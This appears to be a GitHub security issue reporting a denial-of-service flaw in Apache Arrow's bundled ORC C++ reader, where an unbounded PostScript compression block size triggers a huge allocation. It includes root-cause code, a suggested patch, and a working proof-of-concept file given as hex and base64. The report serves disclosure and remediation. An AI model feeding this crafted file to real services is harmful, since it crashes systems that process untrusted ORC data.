Skip to content

Uncontrolled multi-TB allocation in Apache Arrow C++ ORC reader via unbounded PostScript compression_block_size #2650

@OwenSanzas

Description

@OwenSanzas

Summary

A 667-byte crafted ORC file makes arrow::adapters::orc::ORCFileReader::Open
attempt a ~57 TB heap allocation while decoding the file footer, because the
bundled liborc reader trusts the attacker-supplied PostScript
compression_block_size with no upper bound. Any application that opens an
untrusted ORC file through Arrow's public ORC reader can be driven into an
out-of-memory abort / denial of service by a tiny input.

The defective code is in the bundled Apache ORC C++ library (liborc),
reachable through Arrow's public API. The fix belongs in apache/orc; this report
should be filed against apache/orc as well as apache/arrow (which bundles it).
Tested at apache/arrow pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT; ARROW_DEPENDENCY_SOURCE=BUNDLED -> orc-format 1.1.1).

Root Cause

The ORC PostScript carries a compression_block_size (uint64). When liborc
decodes the footer it reads this field verbatim and feeds it straight into a
decompression-buffer allocation that happens before any compressed data is
read
, so the entire attacker-declared block size is allocated up front:

  • getCompressionBlockSize() returns ps.compression_block_size() with no
    bound check (only a 256 KiB default when the field is absent) — c++/src/Reader.cc:59.
  • readFooter() passes that value as the blockSize argument to
    createDecompressor()c++/src/Reader.cc:1357.
  • For compression = ZLIB, createDecompressor() builds a
    ZlibDecompressionStream (c++/src/Compression.cc:1293); its base
    DecompressionStream constructor eagerly constructs
    outputDataBuffer(pool, bufferSize)c++/src/Compression.cc:463.
  • DataBuffer<char>::reserve() then calls memoryPool_.malloc(sizeof(char) * newCapacity)
    c++/src/MemoryPool.cc:106 — with newCapacity equal to the declared block
    size, before a single byte of footer is decompressed.

Vulnerable code (c++/src/Reader.cc:59):

uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
  if (ps.has_compression_block_size()) {
    return ps.compression_block_size();   // attacker-controlled, unbounded
  } else {
    return 256 * 1024;
  }
}

Eager allocation (c++/src/Compression.cc:463 -> c++/src/MemoryPool.cc:106):

// Compression.cc — DecompressionStream ctor allocates the full block up front
DecompressionStream::DecompressionStream(std::unique_ptr<SeekableInputStream> inStream,
                                         size_t bufferSize, MemoryPool& pool,
                                         ReaderMetrics* metrics)
    : pool(pool),
      input(std::move(inStream)),
      outputDataBuffer(pool, bufferSize),   // bufferSize == compression_block_size
      ...

// MemoryPool.cc — reserve() mallocs the whole capacity before any data is read
template <class T>
void DataBuffer<T>::reserve(uint64_t newCapacity) {
  if (newCapacity > currentCapacity_ || !buf_) {
    ...
    buf_ = reinterpret_cast<T*>(memoryPool_.malloc(sizeof(T) * newCapacity));
    currentCapacity_ = newCapacity;
  }
}

Call chain (attacker bytes -> fault):

arrow::adapters::orc::ORCFileReader::Open        adapter.cc:568  (public API)
  -> ORCFileReader::Impl::Open                    adapter.cc:218
    -> orc::createReader                          Reader.cc:1421
      -> orc::readFooter                          Reader.cc:1357   getCompressionBlockSize(ps)
        -> orc::createDecompressor                Compression.cc:1293
          -> orc::ZlibDecompressionStream::ctor   Compression.cc:694
            -> orc::DecompressionStream::ctor     Compression.cc:463
              -> orc::DataBuffer<char>::DataBuffer MemoryPool.cc:57
                -> orc::DataBuffer<char>::reserve  MemoryPool.cc:106  -> malloc(bufferSize)

liborc never validates the declared block size against the remaining
file / footer length before allocating.

PoC

A 667-byte crafted ORC file: a valid ORC magic plus a PostScript declaring
compression = ZLIB and an attacker-chosen compression_block_size
(0x33ffdbbd0000 ~ 57 TB after the buffer math).

# generate_poc.py — re-create the crash input from bytes
import binascii

POC_HEX = (
    "4f52431100000a061204080550003b00000a1b0a0300000012140805120e080310feffffff0f"
    "1882808080105000300000e392e2626660601012e66015e2e56012f8f71f0a180318002b0000"
    "e352e76262601052e4609592e6648080064108fda15e12c6086000004700000a210a05000000"
    "00001218080522120a00120bc3bc6ec3af63c3b664c3a9189c0150002700000a110a04000000"
    "00120908052a030a010350002800002b63616060600262662066036286ffffffff0300200000"
    "fbc7c2c4c400018c30bafe3f18fc0600360000636000811ff6608a81a141bef575e00e394e07"
    "08f7433d549c01000f00004e040102000b402800004b4c4a3abc27eff0fae4c3db520eafaca0"
    "100000050000ffa8a20000e362e360136090e0e602d18c120a609a49421a4c334bc883691609"
    "3530cd2a2106a41981eac4c1349384309866969003d24c40755c603e0b549e55825588858341"
    "800148322191c82240b614b3bb6f0800c40000e3aae462e1600d60e01ae16015e2e36016f8f7"
    "ffff7f7e89a686860601a0a83050949783092c0a068c4041450e5629694e0608681084d01fea"
    "25610ca012090e5625212e0621eec37bf20eaf4f3ebc2de5f04a893920cd9c1cac5acc5c8ccc"
    "010c00680100e3601678cc24c5cdc12cb09051224f212b835549858347889591899985558a39"
    "d3d8084898994831a70109c66229c62405060d060306250e0e66388b05ce6283b3d8e12c0608"
    "cb80d58a85833580c14a848355880f68e1bffffffff34b343534340800458581a2bc1c4c6051"
    "3060040a2a72b04a4973324040832084fe502f096300954870b02a09713008711fde9377787d"
    "f2e16d2987574acc0169e6e460d562e662640e607098e0e7c198c46aa467a067080008b70110"
    "01188080f4ddfdff0c2865300682f403034f524318"
)
data = binascii.unhexlify(POC_HEX)
assert len(data) == 667, len(data)
open("poc.bin", "wb").write(data)

Crash input size: 667 bytes (poc/poc.bin, md5 ec35f54cd76777e4f34f68f79c714a4e).
The PostScript declares compression_block_size such that the decompression
buffer math requests 0x33ffdbbd0000 (~57 TB).

Reproduction

Build Arrow C++ from source with -DARROW_ORC=ON and AddressSanitizer, then open the attached ORC file
through the public reader API:

#include <arrow/adapters/orc/adapter.h>
// auto in = ...read poc.bin into a RandomAccessFile...;
auto reader = arrow::adapters::orc::ORCFileReader::Open(in, arrow::default_memory_pool());  // huge alloc here

liborc's getCompressionBlockSize() returns the attacker-controlled PostScript compression_block_size
with no upper bound, fed to DataBuffer<char>::reserve() -> malloc:

AddressSanitizer: requested allocation size 0x33ffdbbd0000 (~57 TB) exceeds maximum supported size
  DataBuffer<char>::reserve / readFooter (liborc Reader.cc)
  ORCFileReader::Open (cpp/src/arrow/adapters/orc/adapter.cc)

From a 667-byte ORC file. The fix belongs in Apache ORC (liborc getCompressionBlockSize), reached via
the Arrow ORC reader. PoC: 667 bytes (recreate from the base64 below).

Suggested Fix

The fix belongs in Apache ORC (liborc), since the unbounded allocation lives
there. Validate the declared compression_block_size against a sane upper bound
and/or against the remaining footer/file length before constructing the
decompression buffer, rejecting the file with a parse error otherwise. The check
belongs in getCompressionBlockSize() (Reader.cc:59) or at the
createDecompressor call site in readFooter() (Reader.cc:1357), so no caller
can hand an unbounded bufferSize to DecompressionStream:

 uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
   if (ps.has_compression_block_size()) {
-    return ps.compression_block_size();
+    uint64_t blockSize = ps.compression_block_size();
+    // A compression block can never legitimately exceed the input; cap it so a
+    // malicious PostScript cannot force an unbounded up-front allocation.
+    if (blockSize > kMaxCompressionBlockSize) {
+      throw ParseError("Invalid compression block size in PostScript");
+    }
+    return blockSize;
   } else {
     return 256 * 1024;
   }
 }

(The exact bound is upstream's judgement.) Apache Arrow should pick up the fix
when it bumps the bundled liborc; until then Arrow may also consider bounding the
allocation at the adapter layer.

PoC bytes (self-contained)

The trigger input is 667 bytes (poc/poc.bin).
Recreate it exactly with:

base64 -d > poc.bin <<'B64'
T1JDEQAACgYSBAgFUAA7AAAKGwoDAAAAEhQIBRIOCAMQ/v///w8YgoCAgBBQADAAAOOS4mJmYGAQEuZgFeLlYBL49x8KGAMYACsA
AONS52JiYBBS5GCVkuZkgIAGQQj9oV4SxghgAABHAAAKIQoFAAAAAAASGAgFIhIKABILw7xuw69jw7Zkw6kYnAFQACcAAAoRCgQA
AAAAEgkIBSoDCgEDUAAoAAArY2FgYGACYmYgZgNihv////8DACAAAPvHwsTEAAGMMLr+Pxj8BgA2AABjYACBH/ZgioGhQb71deAO
OU4HCPdDPVScAQAPAABOBAECAAtAKAAAS0xKOrwn7/D65MPbUg6vrKAQAAAFAAD/qKIAAONi42ATYJDg5gLRjBIKYJpJQhpMM0vI
g2kWCTUwzSohBqQZgerEwTSThDCYZpaQA9JMQHVcYD4LVJ5VglWIhYNBgAFIMiGRyCJAthSzu28IAMQAAOOq5GLhYA1g4BrhYBXi
42AW+Pf//39+iaaGhgYBoKgwUJSXgwksCgaMQEFFDlYpaU4GCGgQhNAf6iVhDKASCQ5WJSEuBiHuw3vyDq9PPrwt5fBKiTkgzZwc
rFrMXIzMAQwAaAEA42AWeMwkxc3BLLCQUSJPISuDVUmFg0eIlZGJmYVVijnT2AhImJlIMacBCcZiKcYkBQYNBgMGJQ4OZjiLBc5i
g7PY4SwGCMuA1YqFgzWAwUqEg1WID2jhv/////NLNDU0NAgARYWBorwcTGBRMGAECipysEpJczJAQIMghP5QLwljAJVIcLAqCXEw
CHEf3pN3eH3y4W0ph1dKzAFp5uRg1WLmYmQOYHCY4OfBmMRqpGegZwgACLcBEAEYgID03f3/DChlMAaC9AMDT1JDGA==
B64

Credit

Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions